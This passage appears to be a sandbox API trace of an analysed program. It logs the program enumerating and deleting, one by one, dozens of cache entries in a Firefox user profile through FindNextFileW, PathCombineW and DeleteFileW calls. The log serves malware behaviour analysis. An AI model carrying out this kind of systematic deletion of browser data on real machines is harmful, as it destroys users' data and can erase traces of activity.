(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2EAFF2699FCEE0EDFEF4FF824C07727F657B0D45" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2eaff2699fcee0edfef4ff824c07727f657b0d45")) returned 1 [0253.656] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.656] lstrlenW (lpString="2F0A7F5A4CF50FBAA8EC8FB9F3EBEF7461E5FA83") returned 40 [0253.656] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2F0A7F5A4CF50FBAA8EC8FB9F3EBEF7461E5FA83" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2F0A7F5A4CF50FBAA8EC8FB9F3EBEF7461E5FA83") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2F0A7F5A4CF50FBAA8EC8FB9F3EBEF7461E5FA83" [0253.656] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2F0A7F5A4CF50FBAA8EC8FB9F3EBEF7461E5FA83" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2f0a7f5a4cf50fbaa8ec8fb9f3ebef7461e5fa83")) returned 1 [0253.657] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.657] lstrlenW (lpString="2FD2E2A71F89E3A92F68CB796207228217259289") returned 40 [0253.657] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2FD2E2A71F89E3A92F68CB796207228217259289" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2FD2E2A71F89E3A92F68CB796207228217259289") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2FD2E2A71F89E3A92F68CB796207228217259289" [0253.657] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2FD2E2A71F89E3A92F68CB796207228217259289" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2fd2e2a71f89e3a92f68cb796207228217259289")) returned 1 [0253.658] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.658] lstrlenW (lpString="2FEB6245AA212EA51F79468084964097925BD6D6") returned 40 [0253.658] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2FEB6245AA212EA51F79468084964097925BD6D6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2FEB6245AA212EA51F79468084964097925BD6D6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2FEB6245AA212EA51F79468084964097925BD6D6" [0253.658] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2FEB6245AA212EA51F79468084964097925BD6D6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2feb6245aa212ea51f79468084964097925bd6d6")) returned 1 [0253.659] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.659] lstrlenW (lpString="311C19847187CC20C5A8A21FA39C6639F5BBCF67") returned 40 [0253.659] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="311C19847187CC20C5A8A21FA39C6639F5BBCF67" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\311C19847187CC20C5A8A21FA39C6639F5BBCF67") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\311C19847187CC20C5A8A21FA39C6639F5BBCF67" [0253.659] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\311C19847187CC20C5A8A21FA39C6639F5BBCF67" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\311c19847187cc20c5a8a21fa39c6639f5bbcf67")) returned 1 [0253.660] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.660] lstrlenW (lpString="31220725946AC054F523C4029C40CA22A7A42621") returned 40 [0253.660] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="31220725946AC054F523C4029C40CA22A7A42621" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31220725946AC054F523C4029C40CA22A7A42621") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31220725946AC054F523C4029C40CA22A7A42621" [0253.660] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31220725946AC054F523C4029C40CA22A7A42621" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\31220725946ac054f523c4029c40ca22a7a42621")) returned 1 [0253.661] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.661] lstrlenW (lpString="31592C8B017CA0508B5F0339E7E1EA46376F2D31") returned 40 [0253.661] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="31592C8B017CA0508B5F0339E7E1EA46376F2D31" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31592C8B017CA0508B5F0339E7E1EA46376F2D31") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31592C8B017CA0508B5F0339E7E1EA46376F2D31" [0253.661] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31592C8B017CA0508B5F0339E7E1EA46376F2D31" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\31592c8b017ca0508b5f0339e7e1ea46376f2d31")) returned 1 [0253.663] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.663] lstrlenW (lpString="317E80FB14217F5F6E8EAB3C4982A166EBEDBC9C") returned 40 [0253.663] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="317E80FB14217F5F6E8EAB3C4982A166EBEDBC9C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\317E80FB14217F5F6E8EAB3C4982A166EBEDBC9C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\317E80FB14217F5F6E8EAB3C4982A166EBEDBC9C" [0253.663] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\317E80FB14217F5F6E8EAB3C4982A166EBEDBC9C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\317e80fb14217f5f6e8eab3c4982a166ebedbc9c")) returned 1 [0253.663] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.663] lstrlenW (lpString="3194BBD824DE5F4E0F44B99C71BB6C700199B487") returned 40 [0253.663] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3194BBD824DE5F4E0F44B99C71BB6C700199B487" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3194BBD824DE5F4E0F44B99C71BB6C700199B487") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3194BBD824DE5F4E0F44B99C71BB6C700199B487" [0253.663] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3194BBD824DE5F4E0F44B99C71BB6C700199B487" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3194bbd824de5f4e0f44b99c71bb6c700199b487")) returned 1 [0253.664] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.664] lstrlenW (lpString="31F8F1DF56894B1D3F2180DB7128624160D6FD5E") returned 40 [0253.664] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="31F8F1DF56894B1D3F2180DB7128624160D6FD5E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31F8F1DF56894B1D3F2180DB7128624160D6FD5E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31F8F1DF56894B1D3F2180DB7128624160D6FD5E" [0253.664] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\31F8F1DF56894B1D3F2180DB7128624160D6FD5E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\31f8f1df56894b1d3f2180db7128624160d6fd5e")) returned 1 [0253.665] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.666] lstrlenW (lpString="3221C03D33E21E6F8B41DB86EB7B6527177AD6F9") returned 40 [0253.666] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3221C03D33E21E6F8B41DB86EB7B6527177AD6F9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3221C03D33E21E6F8B41DB86EB7B6527177AD6F9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3221C03D33E21E6F8B41DB86EB7B6527177AD6F9" [0253.666] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3221C03D33E21E6F8B41DB86EB7B6527177AD6F9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3221c03d33e21e6f8b41db86eb7b6527177ad6f9")) returned 1 [0253.667] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.667] lstrlenW (lpString="32AFE38EED991EA004851E7C968397C7D9EA501C") returned 40 [0253.667] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="32AFE38EED991EA004851E7C968397C7D9EA501C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\32AFE38EED991EA004851E7C968397C7D9EA501C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\32AFE38EED991EA004851E7C968397C7D9EA501C" [0253.667] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\32AFE38EED991EA004851E7C968397C7D9EA501C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\32afe38eed991ea004851e7c968397c7d9ea501c")) returned 1 [0253.667] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.667] lstrlenW (lpString="32B6927A1EB46E83B230070265358A1C5B788D11") returned 40 [0253.667] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="32B6927A1EB46E83B230070265358A1C5B788D11" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\32B6927A1EB46E83B230070265358A1C5B788D11") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\32B6927A1EB46E83B230070265358A1C5B788D11" [0253.667] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\32B6927A1EB46E83B230070265358A1C5B788D11" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\32b6927a1eb46e83b230070265358a1c5b788d11")) returned 1 [0253.668] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.668] lstrlenW (lpString="3313B622F3B9896C056CB0A1A534E4C91732E665") returned 40 [0253.668] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3313B622F3B9896C056CB0A1A534E4C91732E665" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3313B622F3B9896C056CB0A1A534E4C91732E665") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3313B622F3B9896C056CB0A1A534E4C91732E665" [0253.668] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3313B622F3B9896C056CB0A1A534E4C91732E665" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3313b622f3b9896c056cb0a1a534e4c91732e665")) returned 1 [0253.669] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.670] lstrlenW (lpString="338233A5FF4B5082E562A4B5BFBCDB2581DE81E6") returned 40 [0253.670] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="338233A5FF4B5082E562A4B5BFBCDB2581DE81E6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\338233A5FF4B5082E562A4B5BFBCDB2581DE81E6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\338233A5FF4B5082E562A4B5BFBCDB2581DE81E6" [0253.670] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\338233A5FF4B5082E562A4B5BFBCDB2581DE81E6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\338233a5ff4b5082e562a4b5bfbcdb2581de81e6")) returned 1 [0253.670] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.670] lstrlenW (lpString="339A4E96E26DFFA4704F0AF081D2B85B12D03939") returned 40 [0253.670] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="339A4E96E26DFFA4704F0AF081D2B85B12D03939" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\339A4E96E26DFFA4704F0AF081D2B85B12D03939") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\339A4E96E26DFFA4704F0AF081D2B85B12D03939" [0253.670] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\339A4E96E26DFFA4704F0AF081D2B85B12D03939" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\339a4e96e26dffa4704f0af081d2b85b12d03939")) returned 1 [0253.671] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.671] lstrlenW (lpString="33A34037B96BD19CC90C0A382CEDF384EE052FCC") returned 40 [0253.671] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="33A34037B96BD19CC90C0A382CEDF384EE052FCC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33A34037B96BD19CC90C0A382CEDF384EE052FCC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33A34037B96BD19CC90C0A382CEDF384EE052FCC" [0253.671] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33A34037B96BD19CC90C0A382CEDF384EE052FCC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\33a34037b96bd19cc90c0a382cedf384ee052fcc")) returned 1 [0253.672] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.672] lstrlenW (lpString="33B10E2C53E1205B7527185F086F1BD9A39B07CD") returned 40 [0253.672] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="33B10E2C53E1205B7527185F086F1BD9A39B07CD" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33B10E2C53E1205B7527185F086F1BD9A39B07CD") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33B10E2C53E1205B7527185F086F1BD9A39B07CD" [0253.672] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33B10E2C53E1205B7527185F086F1BD9A39B07CD" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\33b10e2c53e1205b7527185f086f1bd9a39b07cd")) returned 1 [0253.673] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.673] lstrlenW (lpString="33E49DB212B852799023F439D16990005F93C4F7") returned 40 [0253.673] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="33E49DB212B852799023F439D16990005F93C4F7" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33E49DB212B852799023F439D16990005F93C4F7") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33E49DB212B852799023F439D16990005F93C4F7" [0253.673] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33E49DB212B852799023F439D16990005F93C4F7" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\33e49db212b852799023f439d16990005f93c4f7")) returned 1 [0253.673] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.673] lstrlenW (lpString="33E659B30B4E594B210633855AC841A47BB4BBB9") returned 40 [0253.674] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="33E659B30B4E594B210633855AC841A47BB4BBB9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33E659B30B4E594B210633855AC841A47BB4BBB9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33E659B30B4E594B210633855AC841A47BB4BBB9" [0253.674] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\33E659B30B4E594B210633855AC841A47BB4BBB9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\33e659b30b4e594b210633855ac841a47bb4bbb9")) returned 1 [0253.675] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.675] lstrlenW (lpString="346330431993BC995E9F9C114FE39FD5B54EB7DF") returned 40 [0253.675] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="346330431993BC995E9F9C114FE39FD5B54EB7DF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\346330431993BC995E9F9C114FE39FD5B54EB7DF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\346330431993BC995E9F9C114FE39FD5B54EB7DF" [0253.675] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\346330431993BC995E9F9C114FE39FD5B54EB7DF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\346330431993bc995e9f9c114fe39fd5b54eb7df")) returned 1 [0253.675] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.675] lstrlenW (lpString="34CEF73D25CB0DE8A1CD86FB09EF24D17790BCA7") returned 40 [0253.675] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="34CEF73D25CB0DE8A1CD86FB09EF24D17790BCA7" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\34CEF73D25CB0DE8A1CD86FB09EF24D17790BCA7") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\34CEF73D25CB0DE8A1CD86FB09EF24D17790BCA7" [0253.675] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\34CEF73D25CB0DE8A1CD86FB09EF24D17790BCA7" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\34cef73d25cb0de8a1cd86fb09ef24d17790bca7")) returned 1 [0253.676] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.676] lstrlenW (lpString="3502F57243FBD8F9D25E093A72D603074783A304") returned 40 [0253.676] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3502F57243FBD8F9D25E093A72D603074783A304" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3502F57243FBD8F9D25E093A72D603074783A304") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3502F57243FBD8F9D25E093A72D603074783A304" [0253.676] DeleteFileW 